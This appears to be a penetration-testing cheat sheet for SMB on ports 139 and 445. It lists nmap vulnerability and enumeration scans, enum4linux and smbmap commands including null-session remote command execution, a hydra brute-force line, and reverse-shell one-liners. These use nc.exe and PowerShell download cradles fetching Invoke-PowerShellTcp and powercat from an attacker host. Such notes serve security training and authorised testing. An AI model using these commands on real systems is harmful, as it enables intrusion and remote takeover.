x

SMB (139,445)

SMB (Server Message Block), also known as CIFS (Common Internet File System), is a network protocol that allows for file sharing, network browsing, printing services, and inter-process communication over a network.

Port 139 NetBIOS stands for Network Basic Input Output System. It is a software protocol that allows applications, PCs, and Desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network. Software applications that run on a NetBIOS network locate and identify each other via their NetBIOS names. A NetBIOS name is up to 16 characters long and usually, separate from the computer name. Two applications start a NetBIOS session when one (the client) sends a command to “call” another client (the server) over TCP Port 139. (extracted from here)

Port 445 While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

Methodology

Check SMBGhost, NetAPI, EternalBlue

The SMB protocol provides you with the ability to access resources from a server. 

smbclient -L //target-ip -U user -P password

Identify the SMB version with nmap 

nmap --script smb-protocols -p 445 <target-ip>

nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-services.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse -p445 $IP

nmap --script smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse,smb-vuln-webexec.nse -p445 $IP

nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 $IP

OS Discovery 

nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery $IP

Enumerate SMB with Enum4Linux

Enumerate with enum4linux 

enum4linux-ng target-ip

Do all simple enumeration 

enum4linux -a -u "" -p "" 192.168.180.71

Log in as a specific user 

enum4linux -a -u "guest" -p "" $IP

Aggressive, write checks on shares, etc 

enum4linux-ng target-ip -A

Enumerate shares with smbmap

smbmap -H target-ip

smbmap -u "user" -p "pass" -H $IP

smbmap -H $IP -u null

smbmap -H $IP -P 139 2>&1

smbmap -H $IP -P 445 2>&1

smbmap -u null -p "" -H $IP -P 139 -x "ipconfig /all" 2>&1

smbmap -u null -p "" -H $IP -P 445 -x "ipconfig /all" 2>&1

We can call a binary in a shared folder using smbserver and mounting the network share 

\\<ip>\smbFolder\nc.exe -nv <ip> <port> -e powershell.exe

Some Windows rules could block smb connection without credentials. In that case, we can get a reverse shell througth powershell.

Using Invoke-PowerShell 

IEX(New-Object Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port>

Using PowerCat 

IEX (New-Object System.Net.Webclient).DownloadString('http://<ip>/powercat.ps1'); powercat -c <ip> -p <port> -e cmd.exe

Bruteforcing

Combination pair 

hydra -C SecLists/Passwords/Default-Credentials/smb-betterdefaultpasslist.txt 172.16.93.202 smb

https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/

https://hacktricks.boitatech.com.br/pentesting/pentesting-smb
https://hackviser.com/tactics/pentesting/services/smb

Left-click: follow link, Right-click: select node, Scroll: zoom
x